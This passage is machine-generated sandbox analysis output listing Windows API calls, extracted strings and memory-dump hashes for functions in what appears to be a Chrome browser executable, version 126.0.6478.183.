                                                      • Part of subcall function 00D536C0: ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D537C6
                                                      • Part of subcall function 00E282C8: AcquireSRWLockExclusive.KERNEL32(00EF2800,000000C0,?,?,00DBFE69,00F02A10), ref: 00E282D3
                                                      • Part of subcall function 00E282C8: ReleaseSRWLockExclusive.KERNEL32(00EF2800,?,00DBFE69,00F02A10), ref: 00E2830D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: Thread$Current$ExclusiveLock$AcquirePriorityRelease$ErrorLastProcess$DuplicateHandleInformation
                                                    • String ID: GetHandleVerifier
                                                    • API String ID: 2858082395-1090674830
                                                    APIs
                                                    • GetLastError.KERNEL32 ref: 00DB1042
                                                    • SetLastError.KERNEL32(00000000), ref: 00DB104B
                                                    • SetLastError.KERNEL32(00000000), ref: 00DB105C
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00DB1109
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00DB1165
                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00DB11FA
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DB1238
                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 00DB1250
                                                    • __floor_pentium4.LIBCMT ref: 00DB135C
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00DB1450
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00DB146F
                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 00DB148B
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DB1509
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DB1571
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\optional:795: assertion this->has_value() failed: optional operator* called on a disengaged value, xrefs: 00DB14C4
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$Acquire$ErrorLastUnothrow_t@std@@@__ehfuncinfo$??2@$Release$CounterPerformanceQuery__floor_pentium4
                                                    • String ID: ..\..\third_party\libc++\src\include\optional:795: assertion this->has_value() failed: optional operator* called on a disengaged value
                                                    • API String ID: 739387787-2004180939
                                                    APIs
                                                    • GetLastError.KERNEL32 ref: 00DE03A6
                                                    • SetLastError.KERNEL32(00000000), ref: 00DE03B0
                                                    • SetLastError.KERNEL32(00000000), ref: 00DE03C1
                                                    • TryAcquireSRWLockExclusive.KERNEL32(0000055F), ref: 00DE046E
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00DE04CA
                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00DE055F
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DE059D
                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 00DE05B5
                                                    • __floor_pentium4.LIBCMT ref: 00DE06C1
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00DE07B5
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00DE07D4
                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 00DE07F0
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DE086E
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DE08D6
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\optional:795: assertion this->has_value() failed: optional operator* called on a disengaged value, xrefs: 00DE0829
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$Acquire$ErrorLastUnothrow_t@std@@@__ehfuncinfo$??2@$Release$CounterPerformanceQuery__floor_pentium4
                                                    • String ID: ..\..\third_party\libc++\src\include\optional:795: assertion this->has_value() failed: optional operator* called on a disengaged value
                                                    • API String ID: 739387787-2004180939
                                                    APIs
                                                    • GetLastError.KERNEL32(?,00D568F7,?,0000000C,?,00000000,?,?,00E72D92,?,00000001,?,?), ref: 00D5692E
                                                    • SetLastError.KERNEL32(00000000,?,00D568F7,?,0000000C,?,00000000,?,?,00E72D92,?,00000001,?,?), ref: 00D56938
                                                    • _strlen.LIBCMT ref: 00D56947
                                                    • GetLocalTime.KERNEL32(0000000C,?,?,?,?,?,00D568F7,?,0000000C,?,00000000,?,?,00E72D92,?,00000001), ref: 00D569AA
                                                    • _strlen.LIBCMT ref: 00D56AAF
                                                    • SetLastError.KERNEL32(?,?,?,00000001), ref: 00D56B8F
                                                    Strings
                                                    • )] , xrefs: 00D56AFE
                                                    • ..\..\third_party\libc++\src\include\string_view:422: assertion __n <= size() failed: remove_prefix() can't remove more than size(), xrefs: 00D56BCB
                                                    • ..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00D56BC4
                                                    • VERBOSE, xrefs: 00D56C58
                                                    • UNKNOWN, xrefs: 00D56BE8
                                                    • ..\..\third_party\libc++\src\include\string_view:330: assertion (__end - __begin) >= 0 failed: std::string_view::string_view(iterator, sentinel) received invalid range, xrefs: 00D56BD9
                                                    • ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 00D56BD2
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$_strlen$LocalTime
                                                    • String ID: )] $..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length$..\..\third_party\libc++\src\include\string_view:330: assertion (__end - __begin) >= 0 failed: std::string_view::string_view(iterator, sentinel) received invalid range$..\..\third_party\libc++\src\include\string_view:422: assertion __n <= size() failed: remove_prefix() can't remove more than size()$UNKNOWN$VERBOSE
                                                    • API String ID: 1138008395-693731270
                                                    • Opcode ID: 8593e3febf319d544e073c93295e04f5dfee7c7335fb4926bf998af743615561
                                                    • Instruction ID: b9881ccfefca9266ccd1787222b409f6b3fd2def064f9a4b11b4e74dbb1d933c
                                                    • Opcode Fuzzy Hash: 8593e3febf319d544e073c93295e04f5dfee7c7335fb4926bf998af743615561
                                                    • Instruction Fuzzy Hash: 28B1D1B4A002149FCF14AF64D88197EBBB5EF48305B484469EC45BB392EA75DC06CBA1
                                                    APIs
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,chrome.dll,0000000A,?,00000021,?,chrome.dll,0000000A,?,126.0.6478.183,0000000E,?,?,00000004), ref: 00D424E1
                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000008,no-pre-read-main-dll,?,?,00000004), ref: 00D42537
                                                    • SetProcessShutdownParameters.KERNEL32(0000027F,00000001,?,?,00000004), ref: 00D42561
                                                    • GetProcAddress.KERNEL32(?,ChromeMain), ref: 00D4258D
                                                      • Part of subcall function 00D428B0: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D42658), ref: 00D4292B
                                                      • Part of subcall function 00D428B0: PrefetchVirtualMemory.KERNEL32(00000000,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00D42937
                                                    • GetInstallDetailsPayload.CHROME_ELF(00000004), ref: 00D42660
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: CurrentProcess$AddressDetailsDirectoryInstallLibraryLoadMemoryParametersPayloadPrefetchProcShutdownVirtual
                                                    • String ID: ..\..\chrome\app\main_dll_loader_win.cc$126.0.6478.183$Cannot find module $ChromeMain$Failed to load Chrome DLL from $chrome.dll$no-pre-read-main-dll$type
                                                    • API String ID: 1824951502-3802372930
                                                    • Opcode ID: 360a1fcdd29136066f5b92a6cb9923ba8673fec6cb26bc048d80fe739711f6cf
                                                    • Instruction ID: 60f723f7a769e8cc7d90006f938e4db4dbed1beb2c9e82b4bb2db10fbb3eded0
                                                    • Opcode Fuzzy Hash: 360a1fcdd29136066f5b92a6cb9923ba8673fec6cb26bc048d80fe739711f6cf
                                                    • Instruction Fuzzy Hash: C5B1A470E002599BEB20DF64DC45BBEB7B5EF55300F4485AAF409B7281EB709A89CB61
                                                    APIs
                                                    • GetFileVersionInfoSizeW.VERSION(?,00000000,0.0.0.0-devel,0000000D,Chrome,00000006,?,00E578B9,?), ref: 00D74BF2
                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,00000006,?,00E578B9,?), ref: 00D74C1B
                                                      • Part of subcall function 00D74F20: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?), ref: 00D74F82
                                                      • Part of subcall function 00D74F20: GetUserDefaultLangID.KERNEL32(00000000,\VarFileInfo\Translation,?,?), ref: 00D74FAE
                                                      • Part of subcall function 00D74F20: GetUserDefaultLangID.KERNEL32 ref: 00D74FB7
                                                      • Part of subcall function 00D74F20: VerQueryValueW.VERSION(?,?,?,?), ref: 00D75023
                                                    Strings
                                                    • ProductShortName, xrefs: 00D74D72
                                                    • ProductVersion, xrefs: 00D74C46
                                                    • Official Build, xrefs: 00D74CC8
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00D74EA5
                                                    • Chrome, xrefs: 00D74BB1
                                                    • ..\..\third_party\libc++\src\include\__string\char_traits.h:222: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00D74EAC
                                                    • SpecialBuild, xrefs: 00D74DE5
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00D74E9E
                                                    • extended, xrefs: 00D74EF5
                                                    • -devel, xrefs: 00D74EC0
                                                    • 0.0.0.0-devel, xrefs: 00D74BBF
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: DefaultFileInfoLangQueryUserValueVersion$Size
                                                    • String ID: -devel$..\..\third_party\libc++\src\include\__string\char_traits.h:222: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$0.0.0.0-devel$Chrome$Official Build$ProductShortName$ProductVersion$SpecialBuild$extended
                                                    • API String ID: 4255889946-2556447703
                                                    • Opcode ID: 0c24535357dcf08b73dbd16081916a52bcb5caf5440513a6823f5ef38021720a
                                                    • Instruction ID: da5416314289f73ce08a521b913804fbc81f0eeacdb7b085cd1e54693401298d
                                                    • Opcode Fuzzy Hash: 0c24535357dcf08b73dbd16081916a52bcb5caf5440513a6823f5ef38021720a
                                                    • Instruction Fuzzy Hash: ED9106B0D002558BEF02DF54D802BAEB7B1FF58314F19D11AE8497B2A6F771A984C762
                                                    APIs
                                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00D45955
                                                    • OpenProcess.KERNEL32(00000451,00000001,00000000), ref: 00D45963
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00D45970
                                                    • SetLastError.KERNEL32(00000000), ref: 00D45996
                                                    • UpdateProcThreadAttribute.KERNEL32(?,00000000,00020002,?,00000004,00000000,00000000,00000001), ref: 00D459E0
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00D45CF6
                                                    • --thread=, xrefs: 00D45B04
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00D45CEF
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at, xrefs: 00D45C92
                                                    • exception-pointers, xrefs: 00D45A85
                                                    • database, xrefs: 00D45A3F
                                                    • process, xrefs: 00D45AD8
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastProcess$AttributeCurrentOpenProcThreadUpdate
                                                    • String ID: --thread=$..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at$..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$database$exception-pointers$process
                                                    • API String ID: 3486958663-843892808
                                                    • Opcode ID: 9e6f0c45333ea91d621aab7cfb4b504ef8c723a036c856e3e331d738d430da44
                                                    • Instruction ID: 0f97633605950cbb53e2626c4887b4e99c8555e2de6e211524ec2155e151f0a1
                                                    • Opcode Fuzzy Hash: 9e6f0c45333ea91d621aab7cfb4b504ef8c723a036c856e3e331d738d430da44
                                                    • Instruction Fuzzy Hash: ABC1B271E00B589FCB10DFA4E8C1AAEBBB5FF44714F180519E842BB35AE770A945CB61
                                                    APIs
                                                    • CreateFileW.KERNEL32 ref: 00D493FB
                                                    • SetNamedPipeHandleState.KERNEL32(00000000,?,00000000,00000000), ref: 00D49416
                                                    • TransactNamedPipe.KERNEL32(00000000,?,00000024,00D48ED1,0000000C,?,00000000), ref: 00D49439
                                                    • GetLastError.KERNEL32 ref: 00D4947D
                                                    • WaitNamedPipeW.KERNEL32(?,000000FF), ref: 00D49497
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: NamedPipe$CreateErrorFileHandleLastStateTransactWait
                                                    • String ID: , observed $..\..\third_party\crashpad\crashpad\util\win\registration_protocol_win.cc$CreateFile$SetNamedPipeHandleState$TransactNamedPipe$TransactNamedPipe: expected $WaitNamedPipe
                                                    • API String ID: 3582518244-2365249698
                                                    • Opcode ID: 85231c7fd667035a637541fca603e5005d05da96db956dab31eb34036eb9b8a6
                                                    • Instruction ID: 29d09cb9e4437630c55418b6fc4b2f3798ad01c5b47572dc4caca5137aa9bbab
                                                    • Opcode Fuzzy Hash: 85231c7fd667035a637541fca603e5005d05da96db956dab31eb34036eb9b8a6
                                                    • Instruction Fuzzy Hash: 0451E7B0700344ABEF20AB669C56FAF77A9EB85700F084565F50D762C1DB705D49CB62
                                                    APIs
                                                    • LocalFree.KERNEL32(?), ref: 00D6477B
                                                    • CreateFileW.KERNEL32 ref: 00D64841
                                                    • GetLastError.KERNEL32 ref: 00D64851
                                                    • SetLastError.KERNEL32(00000000), ref: 00D64868
                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,00000004,00000004), ref: 00D64987
                                                    • GetProcAddress.KERNEL32(00000000,GetHandleVerifier), ref: 00D64993
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$AddressCreateFileFreeHandleLocalModuleProc
                                                    • String ID: ..\..\base\win\security_util.cc$AddACEToPath$GetHandleVerifier$ScopedBlockingCall
                                                    • API String ID: 24226920-314747623
                                                    • Opcode ID: f65b33c9fb115c39214a069f94c8714e3394407f921422fa6b035d1698ce5129
                                                    • Instruction ID: c34f7d2aef5d27b4c338b1af8881ee556df744d8d855c30c003238218225b1cb
                                                    • Opcode Fuzzy Hash: f65b33c9fb115c39214a069f94c8714e3394407f921422fa6b035d1698ce5129
                                                    • Instruction Fuzzy Hash: ABB10771A043819FD710EF64D88576BB7E4EF99300F18492EF9C5A7251EB70E948CBA2
                                                    APIs
                                                    • __aullrem.LIBCMT ref: 00D83B5B
                                                    • __aullrem.LIBCMT ref: 00D83B8F
                                                    • LoadLibraryW.KERNEL32(bcryptprimitives.dll,?,?,?,?,?,?,?,00E7165C,?,?,00000000), ref: 00D83BCD
                                                    • GetProcAddress.KERNEL32(00000000,ProcessPrng), ref: 00D83BDD
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?,?,-00000001,?,?,?,?,?,?,?,?,?,00E7165C,?,?,00000000), ref: 00D83C1F
                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,00E7165C,?,?,00000000), ref: 00D83C33
                                                    • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,00E7165C,?,?,00000000), ref: 00D83C41
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00D83ACA
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00D83AC3
                                                    • bcryptprimitives.dll, xrefs: 00D83BC8
                                                    • ProcessPrng, xrefs: 00D83BD7
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$Acquire__aullrem$AddressLibraryLoadProcRelease
                                                    • String ID: ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$ProcessPrng$bcryptprimitives.dll
                                                    • API String ID: 1028724378-3360465638
                                                    • Opcode ID: 08d8149fece1ac5e17c4a89b55c08e7a6f93663ec9f1136c8247303ba1d75455
                                                    • Instruction ID: dd40d18dc5a948f6086d5d713700a5e316c479c68dce2b8326c869018b5a8019
                                                    • Opcode Fuzzy Hash: 08d8149fece1ac5e17c4a89b55c08e7a6f93663ec9f1136c8247303ba1d75455
                                                    • Instruction Fuzzy Hash: 3851E771600214AFC714EF29EC85D6B77E9EBC4B10F09852DF959BB291D730AE05C7A2
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,fallback-handler,00000010,?,?), ref: 00D45299
                                                    • GetProcAddress.KERNEL32(00000000,SetUnhandledExceptionFilter), ref: 00D452A9
                                                    Strings
                                                    • SetUnhandledExceptionFilter, xrefs: 00D452A3
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00D4537E
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00D4510F, 00D4530B
                                                    • type, xrefs: 00D451E4
                                                    • test-child-process, xrefs: 00D451F0, 00D45320, 00D45355
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00D45377
                                                    • kernel32.dll, xrefs: 00D45294
                                                    • database, xrefs: 00D45231
                                                    • fallback-handler, xrefs: 00D451DD
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$SetUnhandledExceptionFilter$database$fallback-handler$kernel32.dll$test-child-process$type
                                                    APIs
                                                    • _strlen.LIBCMT ref: 00D33214
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D33361
                                                    • _strlen.LIBCMT ref: 00D333F0
                                                    • _strlen.LIBCMT ref: 00D33519
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D33601
                                                    Strings
                                                    • Other, xrefs: 00D3324B, 00D3364B
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00D3366D
